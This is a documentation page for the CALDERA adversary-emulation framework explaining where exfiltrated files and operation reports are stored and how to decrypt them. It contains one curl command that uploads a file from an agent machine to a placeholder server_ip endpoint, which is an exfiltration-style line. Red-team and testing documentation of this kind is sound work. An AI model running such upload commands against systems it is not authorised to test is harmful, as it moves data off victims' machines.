Exfiltration¶
After completing an operation a user may want to review the data retreived from the target system. This data is automatically stored on the CALDERA server in a directory specified in /conf/default.yml.
Accessing Exfiltrated Files¶
Some abilities will return files from the agent to the CALDERA server. This can also be done manually with
curl -X POST -F 'data=@/file/path/' http://server_ip:8888/file/upload
Note: localhost could be rejected in place of the server IP. In this case you will get error 7. You should type out the full IP. These files are sent from the agent to server_ip/file/upload at which point the server places these files inside the directory specified by /conf/default.yml to key “exfil_dir”. By default it is set to /tmp
Accessing Operations Reports¶
After the server is shut down the reports from operations are placed inside the directory specified by the /conf/default.yml to key “reports_dir”. By default it is also set to /tmp
Unencrypting the files¶
The reports and exfiltrated files are encrypted on the server. To view the file contents the user will have to decrypt the file using /app/utility/file_decryptor.py . This can be performed with:
python /app/utility/file_decryptor.py --config /conf/default.yml _input file path_
The output file will already have the _decrypted tag appended to the end of the file name once the decrypted file is created by the python script.